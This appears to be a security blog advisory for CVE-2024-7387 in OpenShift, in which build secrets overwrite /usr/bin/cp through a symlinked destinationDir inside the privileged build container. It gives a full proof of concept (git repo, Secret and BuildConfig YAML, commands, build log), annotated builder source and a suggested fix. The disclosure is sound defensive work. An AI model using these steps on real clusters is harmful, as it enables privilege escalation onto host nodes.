<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>[Advisory - Red Hat, OpenShift Container Platform] Path traversal allows command injection in privileged BuildContainer using docker build strategy | Red vs. Blue Shell</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="[Advisory - Red Hat, OpenShift Container Platform] Path traversal allows command injection in privileged BuildContainer using docker build strategy" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Product description Red Hat OpenShift is the leading hybrid cloud application platform, bringing together a comprehensive set of tools and services that streamline the entire application lifecycle." />
<meta property="og:description" content="Product description Red Hat OpenShift is the leading hybrid cloud application platform, bringing together a comprehensive set of tools and services that streamline the entire application lifecycle." />
<link rel="canonical" href="/advisory/2024/10/02/openshift-build-docker-priv-esc.html" />
<meta property="og:url" content="/advisory/2024/10/02/openshift-build-docker-priv-esc.html" />
<meta property="og:site_name" content="Red vs. Blue Shell" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-10-02T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="[Advisory - Red Hat, OpenShift Container Platform] Path traversal allows command injection in privileged BuildContainer using docker build strategy" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-10-02T00:00:00+00:00","datePublished":"2024-10-02T00:00:00+00:00","description":"Product description Red Hat OpenShift is the leading hybrid cloud application platform, bringing together a comprehensive set of tools and services that streamline the entire application lifecycle.","headline":"[Advisory - Red Hat, OpenShift Container Platform] Path traversal allows command injection in privileged BuildContainer using docker build strategy","mainEntityOfPage":{"@type":"WebPage","@id":"/advisory/2024/10/02/openshift-build-docker-priv-esc.html"},"url":"/advisory/2024/10/02/openshift-build-docker-priv-esc.html"}</script>
<!-- End Jekyll SEO tag -->
<link id="main-stylesheet" rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="/feed.xml" title="Red vs. Blue Shell" />
</head>
<body><header class="site-header">

  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Red vs. Blue Shell</a>
      <nav class="site-nav">
        <input type="checkbox" id="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon"></span>
        </label>

        <div class="nav-items">
  <a class="nav-item" href="/about/">About</a>
</div>

      </nav>
  </div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">[Advisory - Red Hat, OpenShift Container Platform] Path traversal allows command injection in privileged BuildContainer using docker build strategy</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2024-10-02T00:00:00+00:00" itemprop="datePublished">Oct 2, 2024
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody"><p class="advisory-details">

<table>
    <tr>
        <th>Product:</th>
        <th>Red Hat - OpenShift Container Platform</th>
    </tr>
    <tr>
        <th>Homepage:</th>
        <th><a href="https://www.redhat.com/en/technologies/cloud-computing/openshift">https://www.redhat.com/en/technologies/cloud-computing/openshift</a></th>
    </tr>


    <tr>
        <th>CVE Number:</th>
        <th><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7387">CVE-2024-7387</a></th>
    </tr>



    <tr>
        <th>Tested version:</th>
        <th>see 'Version information'</th>
    </tr>
    
    <tr>
        <th>Vulnerable version:</th>
        <th>https://access.redhat.com/security/cve/CVE-2024-7387</th>
    </tr>
    <tr>
        <th>Fixed version:</th>
        <th>https://access.redhat.com/security/cve/CVE-2024-7387</th>
    </tr>
    <tr>
        <th>CVSS Score:</th>
        <th><span class="Critical">Critical 9.1</span> - <a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H</a>
        </th>
    </tr>
    <tr>
        <th>Found:</th><th>Jul 24, 2024</th>
    </tr>
</table>

</p><h1 id="product-description">Product description</h1>
<p>Red Hat OpenShift is the leading hybrid cloud application platform, bringing together a comprehensive set of tools and services that streamline the entire application lifecycle.</p>

<p>Trusted by 3,000 customers across industries (including 56% of the top 25 Global Fortune 500), it combines built-in security features with dedicated support, a trusted software supply chain, and Red Hat Enterprise Linux® as the operating foundation.</p>

<p>Available in self-managed or fully managed cloud service editions, OpenShift offers a complete set of integrated tools and services for cloud-native, AI, and traditional workloads alike.</p>

<p><a href="https://www.redhat.com/en/technologies/cloud-computing/openshift">Red Hat - OpenShift Platform</a></p>

<h1 id="vulnerability-overview">Vulnerability overview</h1>

<p><code class="language-plaintext highlighter-rouge">OpenShift</code> allows a user to create his own images with the help of the build component. This component has three primary build strategies available (<a href="https://docs.openshift.com/container-platform/4.16/cicd/builds/understanding-image-builds.html">Docu - Understanding image builds</a>):</p>

<ul>
  <li>Docker build</li>
  <li>Source-to-Image (S2I) build</li>
  <li>Custom build</li>
</ul>

<p>As the builds are running in a privileged container, a vulnerability in this process allows an atttacker to escalate their permissions on the cluster and host nodes.</p>

<p>The <code class="language-plaintext highlighter-rouge">custom build</code> is not safe, because they can execute any code within a privileged container and are disabled by default.
The other two strategies are considered as safe and are enabled for all users that can create builds.</p>

<p>But there is a note about the <code class="language-plaintext highlighter-rouge">docker strategy</code>:</p>

<blockquote>
  <p>Grant docker build permissions with caution, because a vulnerability in the Dockerfile processing logic could result in a privileges being granted on the host node.</p>
</blockquote>

<p>See: https://docs.openshift.com/container-platform/4.16/cicd/builds/securing-builds-by-strategy.html</p>

<p>The <code class="language-plaintext highlighter-rouge">docker strategy</code> / the image used during the build has a vulnerabiliy, which allows an attacker to override files inside the privileged build container with the help of the <code class="language-plaintext highlighter-rouge">spec.source.secrets.secret.destinationDir</code> attribute of the <code class="language-plaintext highlighter-rouge">BuildConfig</code> definition. After overriding the binary, execution of this overriden file can be triggered with another secret and the malicious code is executed in the privileged container.</p>

<p>As stated above, running code in a privileged container allows an attacker to escalate their permissions on the cluster and host nodes. As an example the host filesystem of the worker node can be mounted and a new <code class="language-plaintext highlighter-rouge">SSH</code> key can be added to user <code class="language-plaintext highlighter-rouge">core</code> of the <code class="language-plaintext highlighter-rouge">Red Hat Enterprise Linux CoreOS (RHCOS)</code>.</p>

<h1 id="proof-of-concept">Proof of concept</h1>
<p>To exploit the vulnerability the following steps have to be done:</p>

<p>1) Create a <code class="language-plaintext highlighter-rouge">git</code> repository with a <code class="language-plaintext highlighter-rouge">Dockerfile</code> and a symbolic link to <code class="language-plaintext highlighter-rouge">/usr/bin</code>
2) Create a secret, with the key <code class="language-plaintext highlighter-rouge">cp</code> and the content is the bash script executed during exploitation
3) Create another secret with arbitrary content, only used to trigger the exploit
4) Create a <code class="language-plaintext highlighter-rouge">BuildConfig</code>:</p>
<ul>
  <li>Using <code class="language-plaintext highlighter-rouge">docker</code> as <code class="language-plaintext highlighter-rouge">spec.strategy.type</code></li>
  <li>Reference the created ‘git’ repo in <code class="language-plaintext highlighter-rouge">spec.source.git.uri</code></li>
  <li>Reference both secrets in <code class="language-plaintext highlighter-rouge">spec.source.secrets</code></li>
  <li>Set the <code class="language-plaintext highlighter-rouge">spec.source.secrets[0].destinationDir</code> attr to the symblic link from to <code class="language-plaintext highlighter-rouge">git</code> repo
5) Trigger the build, which executes the payload in the privileged container</li>
</ul>

<h2 id="step1---git-repo">Step1 - Git repo</h2>
<p>Create a <code class="language-plaintext highlighter-rouge">git</code> repository which can be access by <code class="language-plaintext highlighter-rouge">OpenShift</code> and add a <code class="language-plaintext highlighter-rouge">Dockerfile</code> and a symbolic link.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> /tmp/poc-repo
<span class="nb">cd</span> /tmp/poc-repo
git init
<span class="nb">touch </span>Dockerfile
<span class="c"># provide content for dockerfile</span>
<span class="nb">ln</span> <span class="nt">-s</span> /usr/bin usr_bin

git add Dockerfile  usr_bin
git commit <span class="nt">-m</span> <span class="s2">"PoC"</span>
git push
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">Dockerfile</code> has the following content (snippet):</p>

<div class="language-dockerfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">COPY</span><span class="s"> . .</span>
<span class="k">RUN </span><span class="nb">ls</span> <span class="nt">-la</span>
</code></pre></div></div>
<p><em><a href="/assets/openshift/Dockerfile">Dockerfile</a></em></p>

<p>It copies all files from the current <code class="language-plaintext highlighter-rouge">docker build</code> <code class="language-plaintext highlighter-rouge">ContextDir</code>. During the build the <code class="language-plaintext highlighter-rouge">ContextDir</code> is set to <code class="language-plaintext highlighter-rouge">/tmp/build/inputs/</code> in the privilged build containers filesystem.
Then it lists all copied files via <code class="language-plaintext highlighter-rouge">ls</code>.</p>

<h2 id="step2---create-secret-with-payload-to-execute">Step2 - Create secret with payload to execute</h2>
<p>Create a new secret which uses the key <code class="language-plaintext highlighter-rouge">cp</code> and set the exploit payload as value and apply it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Secret</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">build-path-traversal</span>  
<span class="na">stringData</span><span class="pi">:</span>
  <span class="na">cp</span><span class="pi">:</span> <span class="pi">|</span>
    <span class="s">#!/bin/bash</span>
    
    <span class="s">touch /tmp/build/inputs/poc-rce.txt</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">Opaque</span>

</code></pre></div></div>
<p><em><a href="/assets/openshift/definition/secret-build-path-traversal.yaml">secret-build-path-traversal.yaml</a></em></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>oc apply <span class="nt">-f</span> ./definition/secret-build-path-traversal.yaml 
secret/build-path-traversal created
</code></pre></div></div>

<p>The provided payload creates a file in the <code class="language-plaintext highlighter-rouge">docker build</code> <code class="language-plaintext highlighter-rouge">ContextDir</code>, which should be copied to the image during the build via <code class="language-plaintext highlighter-rouge">COPY . .</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash    </span>
<span class="nb">touch</span> /tmp/build/inputs/poc-rce.txt
</code></pre></div></div>

<h2 id="step3---create-the-trigger-secret">Step3 - Create the “trigger” secret</h2>
<p>Create a new secret with arbitrary content and apply it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Secret</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">trigger-rce</span>
<span class="na">stringData</span><span class="pi">:</span>
  <span class="na">trigger</span><span class="pi">:</span> <span class="s">pwned</span>

<span class="na">type</span><span class="pi">:</span> <span class="s">Opaque</span>

</code></pre></div></div>
<p><em><a href="/assets/openshift/definition/secret-trigger-rce.yaml">secret-trigger-rce.yml</a></em></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>oc apply <span class="nt">-f</span> ./definition/secret-trigger-rce.yaml
secret/trigger-rce created
</code></pre></div></div>

<h2 id="step4---create-a-buildconfig">Step4 - Create a BuildConfig</h2>
<p>Then <code class="language-plaintext highlighter-rouge">BuildConfig</code> config has to be created and applied.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">BuildConfig</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">build.openshift.io/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">build-priv-esc</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">nodeSelector</span><span class="pi">:</span> <span class="no">null</span>
  <span class="na">strategy</span><span class="pi">:</span>
    <span class="na">type</span><span class="pi">:</span> <span class="s">Docker</span>
    <span class="na">dockerStrategy</span><span class="pi">:</span>    
      <span class="na">dockerfilePath</span><span class="pi">:</span> <span class="s">Dockerfile</span>
  <span class="na">source</span><span class="pi">:</span>
    <span class="na">type</span><span class="pi">:</span> <span class="s">Git</span>
    <span class="na">git</span><span class="pi">:</span>
      <span class="na">uri</span><span class="pi">:</span> <span class="s1">'</span><span class="s">https://&lt;REDACTED&gt;/build-rce-poc.git'</span>
      <span class="na">ref</span><span class="pi">:</span> <span class="s">main</span>
    <span class="na">contextDir</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">secrets</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">secret</span><span class="pi">:</span>
          <span class="na">name</span><span class="pi">:</span> <span class="s">build-path-traversal</span>
        <span class="na">destinationDir</span><span class="pi">:</span> <span class="s">usr_bin</span>
      <span class="pi">-</span> <span class="na">secret</span><span class="pi">:</span>
          <span class="na">name</span><span class="pi">:</span> <span class="s">trigger-rce</span>
</code></pre></div></div>
<p><em><a href="/assets/openshift/definition/build-cfg.yaml">build-cfg.yaml</a></em></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>oc apply <span class="nt">-f</span> ./definition/build-cfg.yaml
buildconfig.build.openshift.io/build-priv-esc created
</code></pre></div></div>

<p>The important parts of this definion are:</p>
<ul>
  <li>Using the <code class="language-plaintext highlighter-rouge">docker strategy</code>:
    <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">nodeSelector</span><span class="pi">:</span> <span class="no">null</span>
  <span class="na">strategy</span><span class="pi">:</span>
    <span class="na">type</span><span class="pi">:</span> <span class="s">Docker</span>  
</code></pre></div>    </div>
  </li>
  <li>Set the <code class="language-plaintext highlighter-rouge">destinationDir</code> of <code class="language-plaintext highlighter-rouge">secret/build-path-traversal</code> to the symbolic link in the <code class="language-plaintext highlighter-rouge">git</code> repo
    <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
<span class="c1"># ....  </span>
    <span class="na">contextDir</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">secrets</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">secret</span><span class="pi">:</span>
          <span class="na">name</span><span class="pi">:</span> <span class="s">build-path-traversal</span>
        <span class="na">destinationDir</span><span class="pi">:</span> <span class="s">usr_bin</span>  
</code></pre></div>    </div>
  </li>
</ul>

<h2 id="step5---trigger-the-build--rce">Step5 - Trigger the build / RCE</h2>
<p>After starting the build, the log can be inspected and verified that <code class="language-plaintext highlighter-rouge">RUN ls -la</code> lists the file <code class="language-plaintext highlighter-rouge">poc-rce.txt</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>oc start-build build-priv-esc
build.build.openshift.io/build-priv-esc-7 started
</code></pre></div></div>

<pre><code class="language-txt">...
STEP 5/8: RUN ls -la
total 4
drwxr-xr-x    1 root     root            70 Jul 31 07:57 .
dr-xr-xr-x    1 root     root            17 Jul 31 07:57 ..
drwxr-xr-x    8 root     root           163 Jul 31 07:57 .git
-rw-r--r--    1 root     root           967 Jul 31 07:57 Dockerfile
-rw-r--r--    1 root     root             0 Jul 31 07:57 poc-rce.txt
...
</code></pre>
<p><em><a href="/assets/openshift/build-log.txt">Build log</a></em></p>

<h1 id="source-of-the-bug">Source of the bug</h1>
<p>The source code of the builder image can be found on <a href="https://github.com/openshift/builder">GitHub - Builder</a>.
Doing some manual source code review revealed the bug. The code for handling the <code class="language-plaintext highlighter-rouge">docker strategy</code> and copying secrets can be found in <code class="language-plaintext highlighter-rouge">pkg\build\builder\docker.go</code>.</p>

<blockquote>
  <p>!NOTE<br />
Comments with the prefix <code class="language-plaintext highlighter-rouge">// &lt;&lt;!! PoC Review !! &gt;&gt;</code> highlight key parts for the exploit.</p>
</blockquote>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// FILE: pkg\build\builder\docker.go</span>

<span class="c">// ----------</span>
<span class="c">// dockerBuild performs a docker build on the source that has been retrieved</span>
<span class="k">func</span> <span class="p">(</span><span class="n">d</span> <span class="o">*</span><span class="n">DockerBuilder</span><span class="p">)</span> <span class="n">dockerBuild</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">dir</span> <span class="kt">string</span><span class="p">,</span> <span class="n">tag</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
	<span class="k">var</span> <span class="n">noCache</span> <span class="kt">bool</span>
	<span class="k">var</span> <span class="n">forcePull</span> <span class="kt">bool</span>
	<span class="k">var</span> <span class="n">buildArgs</span> <span class="p">[]</span><span class="n">docker</span><span class="o">.</span><span class="n">BuildArg</span>
	<span class="n">dockerfilePath</span> <span class="o">:=</span> <span class="n">defaultDockerfilePath</span>
	<span class="k">if</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="k">if</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Source</span><span class="o">.</span><span class="n">ContextDir</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
			<span class="n">dir</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">dir</span><span class="p">,</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Source</span><span class="o">.</span><span class="n">ContextDir</span><span class="p">)</span>
		<span class="p">}</span>
		<span class="k">if</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span><span class="o">.</span><span class="n">DockerfilePath</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
			<span class="n">dockerfilePath</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span><span class="o">.</span><span class="n">DockerfilePath</span>
		<span class="p">}</span>
		<span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">ba</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span><span class="o">.</span><span class="n">BuildArgs</span> <span class="p">{</span>
			<span class="n">buildArgs</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">buildArgs</span><span class="p">,</span> <span class="n">docker</span><span class="o">.</span><span class="n">BuildArg</span><span class="p">{</span><span class="n">Name</span><span class="o">:</span> <span class="n">ba</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span> <span class="n">Value</span><span class="o">:</span> <span class="n">ba</span><span class="o">.</span><span class="n">Value</span><span class="p">})</span>
		<span class="p">}</span>
		<span class="n">noCache</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span><span class="o">.</span><span class="n">NoCache</span>
		<span class="n">forcePull</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Strategy</span><span class="o">.</span><span class="n">DockerStrategy</span><span class="o">.</span><span class="n">ForcePull</span>
	<span class="p">}</span>

	<span class="n">auth</span> <span class="o">:=</span> <span class="n">mergeNodeCredentialsDockerAuth</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Getenv</span><span class="p">(</span><span class="n">dockercfg</span><span class="o">.</span><span class="n">PullAuthType</span><span class="p">))</span>


  <span class="c">// &lt;&lt;!! PoC Review !! &gt;&gt;</span>
  <span class="c">// Call copySecrets during a dockerBuild  </span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">d</span><span class="o">.</span><span class="n">copySecrets</span><span class="p">(</span><span class="n">d</span><span class="o">.</span><span class="n">build</span><span class="o">.</span><span class="n">Spec</span><span class="o">.</span><span class="n">Source</span><span class="o">.</span><span class="n">Secrets</span><span class="p">,</span> <span class="n">dir</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="k">return</span> <span class="n">err</span>
	<span class="p">}</span>

<span class="c">// ----------</span>

<span class="c">// copySecrets copies all files from the directory where the secret is</span>
<span class="c">// mounted in the builder pod to a directory where the is the Dockerfile, so</span>
<span class="c">// users can ADD or COPY the files inside their Dockerfile.</span>
<span class="k">func</span> <span class="p">(</span><span class="n">d</span> <span class="o">*</span><span class="n">DockerBuilder</span><span class="p">)</span> <span class="n">copySecrets</span><span class="p">(</span><span class="n">secrets</span> <span class="p">[]</span><span class="n">buildapiv1</span><span class="o">.</span><span class="n">SecretBuildSource</span><span class="p">,</span> <span class="n">targetDir</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
	<span class="k">var</span> <span class="n">err</span> <span class="kt">error</span>
	<span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">s</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">secrets</span> <span class="p">{</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">copyLocalObject</span><span class="p">(</span><span class="n">secretSource</span><span class="p">(</span><span class="n">s</span><span class="p">),</span> <span class="n">secretBuildSourceBaseMountPath</span><span class="p">,</span> <span class="n">targetDir</span><span class="p">)</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="k">return</span> <span class="n">err</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">d</span> <span class="o">*</span><span class="n">DockerBuilder</span><span class="p">)</span> <span class="n">copyLocalObject</span><span class="p">(</span><span class="n">s</span> <span class="n">localObjectBuildSource</span><span class="p">,</span> <span class="n">sourceDir</span><span class="p">,</span> <span class="n">targetDir</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>


  <span class="c">// &lt;&lt;!! PoC Review !! &gt;&gt;</span>
  <span class="c">// Create dstDir based on the value specified in the BuildConfig definition</span>
  <span class="c">// targetDir := /tmp/build/inputs/  -- docker build context</span>
  <span class="c">// s.DestinationPath() := usr_bin</span>
  <span class="c">// dstDir == /tmp/build/inputs/usr_bin -- Which is a symbolic link to /usr/bin</span>
	<span class="n">dstDir</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">targetDir</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">DestinationPath</span><span class="p">())</span>


  <span class="c">// &lt;&lt;!! PoC Review !! &gt;&gt;</span>
  <span class="c">// Make everything in dstDir `rwx' for `user,group other` `0777`</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">MkdirAll</span><span class="p">(</span><span class="n">dstDir</span><span class="p">,</span> <span class="m">0777</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="k">return</span> <span class="n">err</span>
	<span class="p">}</span>
	<span class="n">log</span><span class="o">.</span><span class="n">V</span><span class="p">(</span><span class="m">3</span><span class="p">)</span><span class="o">.</span><span class="n">Infof</span><span class="p">(</span><span class="s">"Copying files from the build source %q to %q"</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">LocalObjectRef</span><span class="p">()</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span> <span class="n">dstDir</span><span class="p">)</span>

	<span class="c">// Build sources contain nested directories and fairly baroque links. To prevent extra data being</span>
	<span class="c">// copied, perform the following steps:</span>
	<span class="c">//</span>
	<span class="c">// 1. Only top level files and directories within the secret directory are candidates</span>
	<span class="c">// 2. Any item starting with '..' is ignored</span>
	<span class="c">// 3. Destination directories are created first with 0777</span>
	<span class="c">// 4. Use the '-L' option to cp to copy only contents.</span>
	<span class="c">//</span>
	<span class="n">srcDir</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">sourceDir</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">LocalObjectRef</span><span class="p">()</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>


  <span class="c">// &lt;&lt;!! PoC Review !! &gt;&gt;</span>
  <span class="c">// Walk the the mounted secrets specified in the `BuildConfig`</span>
  <span class="c">// As we named the key in `secret/build-path-traversal` `cp` there is a file mounted with this name</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Walk</span><span class="p">(</span><span class="n">srcDir</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">path</span> <span class="kt">string</span><span class="p">,</span> <span class="n">info</span> <span class="n">os</span><span class="o">.</span><span class="n">FileInfo</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="k">return</span> <span class="n">err</span>
		<span class="p">}</span>
		<span class="k">if</span> <span class="n">srcDir</span> <span class="o">==</span> <span class="n">path</span> <span class="p">{</span>
			<span class="k">return</span> <span class="no">nil</span>
		<span class="p">}</span>

		<span class="c">// skip any contents that begin with ".."</span>
		<span class="k">if</span> <span class="n">strings</span><span class="o">.</span><span class="n">HasPrefix</span><span class="p">(</span><span class="n">filepath</span><span class="o">.</span><span class="n">Base</span><span class="p">(</span><span class="n">path</span><span class="p">),</span> <span class="s">".."</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">if</span> <span class="n">info</span><span class="o">.</span><span class="n">IsDir</span><span class="p">()</span> <span class="p">{</span>
				<span class="k">return</span> <span class="n">filepath</span><span class="o">.</span><span class="n">SkipDir</span>
			<span class="p">}</span>
			<span class="k">return</span> <span class="no">nil</span>
		<span class="p">}</span>

		<span class="c">// ensure all directories are traversable</span>
		<span class="k">if</span> <span class="n">info</span><span class="o">.</span><span class="n">IsDir</span><span class="p">()</span> <span class="p">{</span>
			<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">MkdirAll</span><span class="p">(</span><span class="n">dstDir</span><span class="p">,</span> <span class="m">0777</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
				<span class="k">return</span> <span class="n">err</span>
			<span class="p">}</span>
		<span class="p">}</span>


    <span class="c">// &lt;&lt;!! PoC Review !! &gt;&gt;</span>
    <span class="c">// Use the `cp` command to copy the mounted secrets to the 'ContextDir'</span>
    <span class="c">// During processing of `secret/build-path-traversal`</span>
    <span class="c">// cp copies /run/secrets/buidl-path-traversal/cp to /tmp/build/inputs/usr_bin/cp</span>
    <span class="c">// As /tmp/build/inputs/usr_bin is a symbolic link to /usr/bin /usr/bin/cp is replaced by the payload</span>

    <span class="c">// During processing of `secret/trgger-rce` `/usr/bin/cp` is already replaced by the payload and is executed</span>
    <span class="c">// in the privileged build container</span>
		<span class="n">out</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="s">"cp"</span><span class="p">,</span> <span class="s">"-vLRf"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">dstDir</span><span class="o">+</span><span class="s">"/"</span><span class="p">)</span><span class="o">.</span><span class="n">Output</span><span class="p">()</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="n">log</span><span class="o">.</span><span class="n">V</span><span class="p">(</span><span class="m">4</span><span class="p">)</span><span class="o">.</span><span class="n">Infof</span><span class="p">(</span><span class="s">"Build source %q failed to copy: %q"</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">LocalObjectRef</span><span class="p">()</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span> <span class="kt">string</span><span class="p">(</span><span class="n">out</span><span class="p">))</span>
			<span class="k">return</span> <span class="n">err</span>
		<span class="p">}</span>		
<span class="p">}</span>
</code></pre></div></div>

<h1 id="solution">Solution</h1>

<p>To fix this vulnerability the variable <code class="language-plaintext highlighter-rouge">dstDir</code> in the function <code class="language-plaintext highlighter-rouge">copyLocalObject</code> has to be validated to share a common <code class="language-plaintext highlighter-rouge">basePath</code> with the <code class="language-plaintext highlighter-rouge">docker build</code> <code class="language-plaintext highlighter-rouge">ContextDir</code> after it has been made absolute (resolve <code class="language-plaintext highlighter-rouge">/../</code> ) and canonicalized (resolve symblic links).</p>

<h1 id="version-information">Version information</h1>
